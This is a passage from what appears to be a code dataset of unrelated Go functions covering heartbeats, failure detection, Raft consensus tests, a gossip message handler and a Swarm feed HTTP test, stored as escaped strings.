remote node.\n\tlocalIpPortMon := \"127.0.0.1:9001\"\n\terr = fd.AddMonitor(localIpPortMon, localIpPort, lostMsgThresh)\n\tif common.CheckError(err) != nil {\n\t\treturn\n\t}\n\n\tfmt.Println(\"Started to monitor node: \", localIpPort)\n\n\t// Wait indefinitely, blocking on the notify channel, to detect a\n\t// failure.\n\tstopRespondingTicker := time.NewTicker(5*time.Second)\n\tfor {\n\t\tselect {\n\t\tcase notify := <-notifyCh:\n\t\t\tfmt.Println(\"Success - Detected a failure of\", notify)\n\t\t\treturn\n\t\tcase <-stopRespondingTicker.C:\n\t\t\tstopRespondingTicker.Stop()\n\t\t\tfd.StopResponding()\n\t\t}\n\t}\n\n}", "func SendHeartBeat(userManageConn redis.Conn, username string, userDBKey string, chatExit *bool) {\n\n\t// Continue sending heartbeats until chat exit is not called\n\tfor !*chatExit {\n\n\t\t// Here user is expected to exist\n\t\t_, err := userManageConn.Do(\"SET\", userDBKey, username, \"XX\", \"EX\", \"100\")\n\n\t\tif err != nil {\n\t\t\tfmt.Println(err)\n\t\t\tfmt.Println(\"Heart beat not accecpted\")\n\t\t\tos.Exit(1)\n\t\t}\n\n\t\t// Send heartbeat every 80 seconds to avoid expiry\n\t\ttime.Sleep(80 * time.Second)\n\n\t}\n\n}", "func (c *Client) heartbeat() error {\n\trequest := &proto.PingRequest{Offset: c.RemoteOffset(), Addr: c.LocalAddr().String()}\n\tresponse := &proto.PingResponse{}\n\tsendTime := c.clock.PhysicalNow()\n\tcall := c.Go(\"Heartbeat.Ping\", request, response, nil)\n\tselect {\n\tcase <-call.Done:\n\t\treceiveTime := c.clock.PhysicalNow()\n\t\tif log.V(2) {\n\t\t\tlog.Infof(\"client %s heartbeat: %v\", c.Addr(), call.Error)\n\t\t}\n\t\tif call.Error == nil {\n\t\t\t// Only update the clock offset measurement if we actually got a\n\t\t\t// successful response from the server.\n\t\t\tc.mu.Lock()\n\t\t\tc.healthy = true\n\t\t\tif receiveTime-sendTime > maximumClockReadingDelay.Nanoseconds() {\n\t\t\t\tc.offset.Reset()\n\t\t\t} else {\n\t\t\t\t// Offset and error are measured using the remote clock reading\n\t\t\t\t// technique described in\n\t\t\t\t// http://se.inf.tu-dresden.de/pubs/papers/SRDS1994.pdf, page 6.\n\t\t\t\t// However, we assume that drift and min message delay are 0, for\n\t\t\t\t// now.\n\t\t\t\tc.offset.MeasuredAt = receiveTime\n\t\t\t\tc.offset.Uncertainty = (receiveTime - sendTime) / 2\n\t\t\t\tremoteTimeNow := response.ServerTime + (receiveTime-sendTime)/2\n\t\t\t\tc.offset.Offset = remoteTimeNow - receiveTime\n\t\t\t}\n\t\t\toffset := c.offset\n\t\t\tc.mu.Unlock()\n\t\t\tif offset.MeasuredAt != 0 {\n\t\t\t\tc.remoteClocks.UpdateOffset(c.addr.String(), offset)\n\t\t\t}\n\t\t}\n\t\treturn call.Error\n\tcase <-time.After(heartbeatInterval * 2):\n\t\t// Allowed twice heartbeat interval.\n\t\tc.mu.Lock()\n\t\tc.healthy = false\n\t\tc.offset.Reset()\n\t\tc.mu.Unlock()\n\t\tlog.Warningf(\"client %s unhealthy after %s\", c.Addr(), heartbeatInterval)\n\t\treturn util.Errorf(\"client timeout\")\n\tcase <-c.Closed:\n\t\treturn util.Errorf(\"client is closed\")\n\t}\n}", "func TestMain_Discoverd(t *testing.T) {\n\tm := NewMain()\n\tdefer m.Close()\n\n\t// Mock heartbeater.\n\tvar hbClosed bool\n\thb := NewHeartbeater(\"127.0.0.1:0\")\n\thb.CloseFn = func() error { hbClosed = true; return nil }\n\n\t// Validate arguments passed to discoverd.\n\tm.DiscoverdClient.AddServiceFn = func(name string, config *discoverd.ServiceConfig) error {\n\t\tif name != \"redis\" {\n\t\t\tt.Fatalf(\"unexpected service name: %s\", name)\n\t\t}\n\t\treturn nil\n\t}\n\tm.DiscoverdClient.RegisterInstanceFn = func(service string, inst *discoverd.Instance) (discoverd.Heartbeater, error) {\n\t\tif service != \"redis\" {\n\t\t\tt.Fatalf(\"unexpected service: %s\", service)\n\t\t} else if !reflect.DeepEqual(inst, &discoverd.Instance{\n\t\t\tAddr: \":6379\",\n\t\t\tMeta: map[string]string{\"REDIS_ID\": m.Process.ID},\n\t\t}) {\n\t\t\tt.Fatalf(\"unexpected inst: %#v\", inst)\n\t\t}\n\t\treturn hb, nil\n\t}\n\n\t// set a password\n\tm.Process.Password = \"test\"\n\n\t// Execute program.\n\tif err := m.Run(); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Close program and validate that the heartbeater was closed.\n\tif err := m.Close(); err != nil {\n\t\tt.Fatal(err)\n\t} else if !hbClosed {\n\t\tt.Fatal(\"expected heartbeater close\")\n\t}\n}", "func TestLeaderSyncFollowerLog(t *testing.T) {\n\tents := []pb.Entry{\n\t\t{},\n\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10},\n\t}\n\tterm := uint64(8)\n\ttests := [][]pb.Entry{\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10}, {Term: 6, Index: 11},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10},\n\t\t\t{Term: 7, Index: 11}, {Term: 7, Index: 12},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5}, {Term: 4, Index: 6}, {Term: 4, Index: 7},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 2, Index: 4}, {Term: 2, Index: 5}, {Term: 2, Index: 6},\n\t\t\t{Term: 3, Index: 7}, {Term: 3, Index: 8}, {Term: 3, Index: 9}, {Term: 3, Index: 10}, {Term: 3, Index: 11},\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tleadStorage := NewMemoryStorage()\n\t\tdefer leadStorage.Close()\n\t\tleadStorage.Append(ents)\n\t\tlead := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, leadStorage)\n\t\tlead.loadState(pb.HardState{Commit: lead.raftLog.lastIndex(), Term: term})\n\t\tfollowerStorage := NewMemoryStorage()\n\t\tdefer followerStorage.Close()\n\t\tfollowerStorage.Append(tt)\n\t\tfollower := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, followerStorage)\n\t\tfollower.loadState(pb.HardState{Term: term - 1})\n\t\t// It is necessary to have a three-node cluster.\n\t\t// The second may have more up-to-date log than the first one, so the\n\t\t// first node needs the vote from the third node to become the leader.\n\t\tn := newNetwork(lead, follower, nopStepper)\n\t\tn.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\t\t// The election occurs in the term after the one we loaded with\n\t\t// lead.loadState above.\n\t\tn.send(pb.Message{From: 3, To: 1, Type: pb.MsgVoteResp, Term: term + 1})\n\n\t\tn.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\t\tif g := diffu(ltoa(lead.raftLog), ltoa(follower.raftLog)); g != \"\" {\n\t\t\tt.Errorf(\"#%d: log diff:\\n%s\", i, g)\n\t\t}\n\t}\n}", "func (vc *Connection) heartbeat(every time.Duration) {\n\tdefer vc.wg.Done()\n\n\tvc.logger.Debug(\"starting voice connection heartbeater\")\n\tdefer vc.logger.Debug(\"stopped voice connection heartbeater\")\n\n\theartbeat.Run(\n\t\tevery,\n\t\tvc.sendHeartbeatPayload,\n\t\tvc.lastHeartbeatAck,\n\t\tvc.lastHeartbeatSent,\n\t\tvc.stop,\n\t\tvc.reportErr,\n\t)\n}", "func ExampleDial_heartbeat() {\n\tDial(\"tcp\", \"localhost:61613\", Heartbeat(0, 1000))\n}", "func recvHeartBeat(sock *net.UDPConn, myMembers map[string]Entry, selfName string, c chan KVData) {\n\tfor {\n\t\t//we should change the byte length in the future\n\t\t//First initialize connection\n\t\tbuf := make([]byte, RECV_BUF_LEN)\n\t\t//fmt.Println(\"before\")\n\t\trlen, _, err := sock.ReadFromUDP(buf)\n\t\t//fmt.Println(\"after\")\n\t\tif QUIT == true {\n\t\t\treturn\n\t\t}\n\t\tlogError(err)\n\n\t\t//Second, setting up member information from retrieved value\n\t\tvar receivedMessage Message\n\t\terr = json.Unmarshal(buf[:rlen], &receivedMessage)\n\n\t\tif receivedMessage.Datatype == \"gossip\" {\n\t\t\treceivedMessageData := convertToEntryMap(receivedMessage.Data)\n\t\t\tgossipProtocolHandler(receivedMessageData, myMembers)\n\t\t} else if receivedMessage.Datatype == \"keyvalue\" {\n\t\t\treceivedMessageData := convertToKVData(receivedMessage.Data)\n\t\t\tkeyValueProtocolHandler(receivedMessageData, myMembers, selfName)\n\t\t} else if receivedMessage.Datatype == \"kvresp\" {\n\t\t\t//This handler is mainly just for testing client-stuff\n\t\t\treceivedMessageData := convertToKVData(receivedMessage.Data)\n\n\t\t\t//c <- receivedMessageData\n\n\t\t\tselect {\n\t\t\tcase c <- receivedMessageData:\n\t\t\tdefault:\n\t\t\t\t//fmt.Print(\"WARNING: Message received but not parsed | \")\n\t\t\t\t//fmt.Println(receivedMessageData)\n\t\t\t}\n\t\t} else if receivedMessage.Datatype == \"string\" {\n\t\t\tfmt.Println(receivedMessage.Data.(string))\n\t\t} else if receivedMessage.Datatype == \"batchkeys\" {\n\t\t\tbatchkeysProtocolHandler(receivedMessage.Data)\n\t\t} else if receivedMessage.Datatype == \"updateRM\" {\n\t\t\treceivedMessageData := convertToRM(receivedMessage.Data)\n\t\t\tupdateRMProtocolHandler(receivedMessageData, myMembers)\n\t\t} else if receivedMessage.Datatype == \"elected\" {\n\t\t\treceivedMessageData := convertToKVData(receivedMessage.Data)\n\t\t\tleaderProtocolHandler(receivedMessageData, myMembers)\n\t\t} else if receivedMessage.Datatype == \"first\" {\n\t\t\treceivedMessageData := convertToKVData(receivedMessage.Data)\n\t\t\tfirstKeyValueCommandHandler(receivedMessageData, myMembers)\n\t\t} else if receivedMessage.Datatype == \"leader-ask\" {\n\t\t\trequesting_ip := receivedMessage.Data.(string)\n\t\t\tleaderTellHandler(requesting_ip)\n\t\t} else if receivedMessage.Datatype == \"leader-tell\" {\n\t\t\tRM_LEADER = receivedMessage.Data.(string)\n\t\t} else if receivedMessage.Datatype == \"rmRequest\" {\n\t\t\trequesting_ip := receivedMessage.Data.(string)\n\t\t\trmRequestHandler(requesting_ip)\n\t\t} else if receivedMessage.Datatype == \"askforvalue\" {\n\t\t\trequestValueHandler(receivedMessage.Data.(string))\n\t\t} else if receivedMessage.Datatype == \"fillSparseEntry\" {\n\t\t\tfillSparseEntryHandler(receivedMessage.Data.(string), myMembers)\n\t\t}\n\t\tif err != nil {\n\t\t\tfmt.Print(\"MARSHALFAIL:\")\n\t\t\tfmt.Print(err)\n\t\t\tfmt.Println(time.Now())\n\t\t}\n\t}\n}", "func (sm *State_Machine) FollTesting(t *testing.T) {\n\n\t//Creating a follower which has just joined the cluster.\n\tvar follTC TestCases\n\tfollTC.t = t\n\tvar cmdReq = []string{\"read test\", \"read cs733\"}\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:2|LoggIng:1|votedFor:0|commitInd:0|>>>\n\n\t/*Sending an apped request*/\n\tfollTC.req = Append{Data: []byte(cmdReq[0])}\n\tfollTC.respExp = Commit{Data: []byte(\"5000\"), Err: []byte(\"I'm not leader\")}\n\tsm.ClientCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t/*Sending appendEntry request*/\n\t//Suppose leader and follower are at same Term.\n\tentries1 := Logg{Logg: []MyLogg{{1, \"read test\"}}}\n\tfollTC.req = AppEntrReq{Term: 1, LeaderId: 5000, PreLoggInd: 0, PreLoggTerm: 2, Logg: entries1, LeaderCom: 0}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 1, Succ: true}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 0}\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting LogStore\n\tfollTC.respExp = Alarm{T: 0}\n\tfollTC.expect()\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:1|LoggInd:1|votedFor:0|commitInd:0|lastApp:0|>>>\n\n\t//Sending Multiple entries\n\tentries2 := Logg{Logg: []MyLogg{{1, \"read test\"}, {1, \"read cloud\"}, {1, \"read cs733\"}}}\n\tfollTC.req = AppEntrReq{Term: 1, LeaderId: 5000, PreLoggInd: 0, PreLoggTerm: 1, Logg: entries2, LeaderCom: 1}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 1, Succ: true}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:1|LoggInd:3|votedFor:0|commitInd:1|lastApp:0|>>>\n\n\t//Suppose leader has higher Term than follower.\n\tentries3 := Logg{Logg: []MyLogg{{1, \"read cs733\"}, {2, \"delete test\"}}}\n\tfollTC.req = AppEntrReq{Term: 2, LeaderId: 5000, PreLoggInd: 2, PreLoggTerm: 1, Logg: entries3, LeaderCom: 2}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 2, Succ: true}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:2|LoggIng:4|votedFor:0|commitInd:2|lastApp:0|>>>\n\n\t//Suppose follower has higher Term than leader.\n\tentries4 := Logg{Logg: []MyLogg{{1, \"read cs733\"}, {2, \"delete test\"}}}\n\tfollTC.req = AppEntrReq{Term: 1, LeaderId: 5000, PreLoggInd: 2, PreLoggTerm: 2, Logg: entries4, LeaderCom: 2}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 2, Succ: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//Suppose prevIndex does not matches.\n\tentries4 = Logg{Logg: []MyLogg{{3, \"append test\"}, {3, \"cas test\"}}}\n\tfollTC.req = AppEntrReq{Term: 3, LeaderId: 5000, PreLoggInd: 5, PreLoggTerm: 3, Logg: entries4, LeaderCom: 2}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 2, Succ: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//Suppose prevIndex matches, but entry doesnt.\n\tentries4 = Logg{Logg: []MyLogg{{3, \"append test\"}, {3, \"cas test\"}}}\n\tfollTC.req = AppEntrReq{Term: 3, LeaderId: 5000, PreLoggInd: 3, PreLoggTerm: 3, Logg: entries4, LeaderCom: 2}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 2, Succ: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//Everything is ok, but no entry.\n\tfollTC.req = AppEntrReq{Term: 3, LeaderId: 5000, PreLoggInd: 3, PreLoggTerm: 3, LeaderCom: 2}\n\tfollTC.respExp = Alarm{T: 200}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t/*Sending vote request*/\n\t//sending vote request with lower Term.\n\tfollTC.req = VoteReq{Term: 1, CandId: 2000, PreLoggInd: 1, PreLoggTerm: 1}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 2, VoteGrant: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t//sending vote request with not updated Logg.\n\tfollTC.req = VoteReq{Term: 3, CandId: 2000, PreLoggInd: 1, PreLoggTerm: 1}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 2, VoteGrant: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t//sending vote request with not updated Logg.\n\tfollTC.req = VoteReq{Term: 3, CandId: 2000, PreLoggInd: 5, PreLoggTerm: 4}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 3, VoteGrant: true}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:3|LoggIng:4|votedFor:1|commitInd:2|lastApp:0|>>>\n\n\t//checking against duplicate vote rquest\n\tfollTC.req = VoteReq{Term: 3, CandId: 2000, PreLoggInd: 5, PreLoggTerm: 4}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 3, VoteGrant: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t/*Sending timeout*/\n\tfollTC.req = Timeout{}\n\tfollTC.respExp = Alarm{T: 150}\n\tsm.TimeoutCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.respExp = Send{PeerId: 0, Event: VoteReq{Term: 4, CandId: 1000, PreLoggInd: 3, PreLoggTerm: 2}} //also the vote request\n\tfollTC.expect()\n\n}", "func TestBzzFeed(t *testing.T) {\n\tsrv := NewTestSwarmServer(t, serverFunc, nil)\n\tsigner, _ := newTestSigner()\n\n\tdefer srv.Close()\n\n\t// data of update 1\n\tupdate1Data := testutil.RandomBytes(1, 666)\n\tupdate1Timestamp := srv.CurrentTime\n\t//data for update 2\n\tupdate2Data := []byte(\"foo\")\n\n\ttopic, _ := feed.NewTopic(\"foo.eth\", nil)\n\tupdateRequest := feed.NewFirstRequest(topic)\n\tupdateRequest.SetData(update1Data)\n\n\tif err := updateRequest.Sign(signer); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// creates feed and sets update 1\n\ttestUrl, err := url.Parse(fmt.Sprintf(\"%s/bzz-feed:/\", srv.URL))\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\turlQuery := testUrl.Query()\n\tbody := updateRequest.AppendValues(urlQuery) // this adds all query parameters\n\turlQuery.Set(\"manifest\", \"1\") // indicate we want a manifest back\n\ttestUrl.RawQuery = urlQuery.Encode()\n\n\tresp, err := http.Post(testUrl.String(), \"application/octet-stream\", bytes.NewReader(body))\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tdefer resp.Body.Close()\n\tif resp.StatusCode != http.StatusOK {\n\t\tt.Fatalf(\"err %s\", resp.Status)\n\t}\n\tb, err := ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\trsrcResp := &storage.Address{}\n\terr = json.Unmarshal(b, rsrcResp)\n\tif err != nil {\n\t\tt.Fatalf(\"data %s could not be unmarshaled: %v\", b, err)\n\t}\n\n\tcorrectManifestAddrHex := \"bb056a5264c295c2b0f613c8409b9c87ce9d71576ace02458160df4cc894210b\"\n\tif rsrcResp.Hex() != correctManifestAddrHex {\n\t\tt.Fatalf(\"Response feed manifest mismatch, expected '%s', got '%s'\", correctManifestAddrHex, rsrcResp.Hex())\n\t}\n\n\t// get the manifest\n\ttestRawUrl := fmt.Sprintf(\"%s/bzz-raw:/%s\", srv.URL, rsrcResp)\n\tresp, err = http.Get(testRawUrl)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tdefer resp.Body.Close()\n\tif resp.StatusCode != http.StatusOK {\n\t\tt.Fatalf(\"err %s\", resp.Status)\n\t}\n\tb, err = ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tmanifest := &api.Manifest{}\n\terr = json.Unmarshal(b, manifest)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif len(manifest.Entries) != 1 {\n\t\tt.Fatalf(\"Manifest has %d entries\", len(manifest.Entries))\n\t}\n\tcorrectFeedHex := \"0x666f6f2e65746800000000000000000000000000000000000000000000000000c96aaa54e2d44c299564da76e1cd3184a2386b8d\"\n\tif manifest.Entries[0].Feed.Hex() != correctFeedHex {\n\t\tt.Fatalf(\"Expected manifest Feed '%s', got '%s'\", correctFeedHex, manifest.Entries[0].Feed.Hex())\n\t}\n\n\t// take the chance to have bzz: crash on resolving a feed update that does not contain\n\t// a swarm hash:\n\ttestBzzUrl := fmt.Sprintf(\"%s/bzz:/%s\", srv.URL, rsrcResp)\n\tresp, err = http.Get(testBzzUrl)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tdefer resp.Body.Close()\n\tif resp.StatusCode == http.StatusOK {\n\t\tt.Fatal(\"Expected error status since feed update does not contain a Swarm hash. Received 200 OK\")\n\t}\n\t_, err = ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// get non-existent name, should fail\n\ttestBzzResUrl := fmt.Sprintf(\"%s/bzz-feed:/bar\", srv.URL)\n\tresp, err = http.Get(testBzzResUrl)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tif resp.StatusCode != http.StatusNotFound {\n\t\tt.Fatalf(\"Expected get non-existent feed manifest to fail with StatusNotFound (404), got %d\", resp.StatusCode)\n\t}\n\n\tresp.Body.Close()\n\n\t// get latest update through bzz-feed directly\n\tlog.Info(\"get update latest = 1.1\", \"addr\", correctManifestAddrHex)\n\ttestBzzResUrl = fmt.Sprintf(\"%s/bzz-feed:/%s\", srv.URL, correctManifestAddrHex)\n\tresp, err = http.Get(testBzzResUrl)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tdefer resp.Body.Close()\n\tif resp.StatusCode != http.StatusOK {\n\t\tt.Fatalf(\"err %s\", resp.Status)\n\t}\n\tb, err = ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif !bytes.Equal(update1Data, b) {\n\t\tt.Fatalf(\"Expected body '%x', got '%x'\", update1Data, b)\n\t}\n\n\t// update 2\n\t// Move the clock ahead 1 second\n\tsrv.CurrentTime++\n\tlog.Info(\"update 2\")\n\n\t// 1.- get metadata about this feed\n\ttestBzzResUrl = fmt.Sprintf(\"%s/bzz-feed:/%s/\", srv.URL, correctManifestAddrHex)\n\tresp, err = http.Get(testBzzResUrl + \"?meta=1\")\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tdefer resp.Body.Close()\n\tif resp.StatusCode != http.StatusOK {\n\t\tt.Fatalf(\"Get feed metadata returned %s\", resp.Status)\n\t}\n\tb, err = ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tupdateRequest = &feed.Request{}\n\tif err = updateRequest.UnmarshalJSON(b); err != nil {\n\t\tt.Fatalf(\"Error decoding feed metadata: %s\", err)\n\t}\n\tupdateRequest.SetData(update2Data)\n\tif err = updateRequest.Sign(signer); err != nil {\n\t\tt.Fatal(err)\n\t}\n\ttestUrl, err = url.Parse(fmt.Sprintf(\"%s/bzz-feed:/\", srv.URL))\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\turlQuery = testUrl.Query()\n\tbody = updateRequest.AppendValues(urlQuery) // this adds all query parameters\n\tgoodQueryParameters := urlQuery.Encode() // save the query parameters for a second attempt\n\n\t// create bad query parameters in which the signature is missing\n\turlQuery.Del(\"signature\")\n\ttestUrl.RawQuery = urlQuery.Encode()\n\n\t// 1st attempt with bad query parameters in which the signature is missing\n\tresp, err = http.Post(testUrl.String(), \"application/octet-stream\", bytes.NewReader(body))\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tdefer resp.Body.Close()\n\texpectedCode := http.StatusBadRequest\n\tif resp.StatusCode != expectedCode {\n\t\tt.Fatalf(\"Update returned %s. Expected %d\", resp.Status, expectedCode)\n\t}\n\n\t// 2nd attempt with bad query parameters in which the signature is of incorrect length\n\turlQuery.Set(\"signature\", \"0xabcd\") // should be 130 hex chars\n\tresp, err = http.Post(testUrl.String(), \"application/octet-stream\", bytes.NewReader(body))\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tdefer resp.Body.Close()\n\texpectedCode = http.StatusBadRequest\n\tif resp.StatusCode != expectedCode {\n\t\tt.Fatalf(\"Update returned %s. Expected %d\", resp.Status, expectedCode)\n\t}\n\n\t// 3rd attempt, with good query parameters:\n\ttestUrl.RawQuery = goodQueryParameters\n\tresp, err = http.Post(testUrl.String(), \"application/octet-stream\", bytes.NewReader(body))\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tdefer resp.Body.Close()\n\texpectedCode = http.StatusOK\n\tif resp.StatusCode != expectedCode {\n\t\tt.Fatalf(\"Update returned %s. Expected %d\", resp.Status, expectedCode)\n\t}\n\n\t// get latest update through bzz-feed directly\n\tlog.Info(\"get update 1.2\")\n\ttestBzzResUrl = fmt.Sprintf(\"%s/bzz-feed:/%s\", srv.URL, correctManifestAddrHex)\n\tresp, err = http.Get(testBzzResUrl)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tdefer resp.Body.Close()\n\tif resp.StatusCode != http.StatusOK {\n\t\tt.Fatalf(\"err %s\", resp.Status)\n\t}\n\tb, err = ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif !bytes.Equal(update2Data, b) {\n\t\tt.Fatalf(\"Expected body '%x', got '%x'\", update2Data, b)\n\t}\n\n\t// test manifest-less queries\n\tlog.Info(\"get first update in update1Timestamp via direct query\")\n\tquery := feed.NewQuery(&updateRequest.Feed, update1Timestamp, lookup.NoClue)\n\n\turlq, err := url.Parse(fmt.Sprintf(\"%s/bzz-feed:/\", srv.URL))\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tvalues := urlq.Query()\n\tquery.AppendValues(values) // this adds feed query parameters\n\turlq.RawQuery = values.Encode()\n\tresp, err = http.Get(urlq.String())\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tdefer resp.Body.Close()\n\tif resp.StatusCode != http.StatusOK {\n\t\tt.Fatalf(\"err %s\", resp.Status)\n\t}\n\tb, err = ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif !bytes.Equal(update1Data, b) {\n\t\tt.Fatalf(\"Expected body '%x', got '%x'\", update1Data, b)\n\t}\n\n}", "func sendHeartbeats(s *Sailor) error {\n\tfor _, peer := range s.client.Peers {\n\t\terr := sendAppendEntries(s, peer)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}", "func TestLeaderFailure(t *testing.T){\r\n\tif !TESTLEADERFAILURE{\r\n\t\treturn\r\n\t}\r\n rafts,_ := makeRafts(5, \"input_spec.json\", \"log\", 200, 300)\t\r\n\ttime.Sleep(2*time.Second)\t\t\t\r\n\trunning := make(map[int]bool)\r\n\tfor i:=1;i<=5;i++{\r\n\t\trunning[i] = true\r\n\t}\r\n\trafts[0].smLock.RLock()\r\n\tlid := rafts[0].LeaderId()\r\n\trafts[0].smLock.RUnlock()\r\n\tdebugRaftTest(fmt.Sprintf(\"leader Id:%v\\n\", 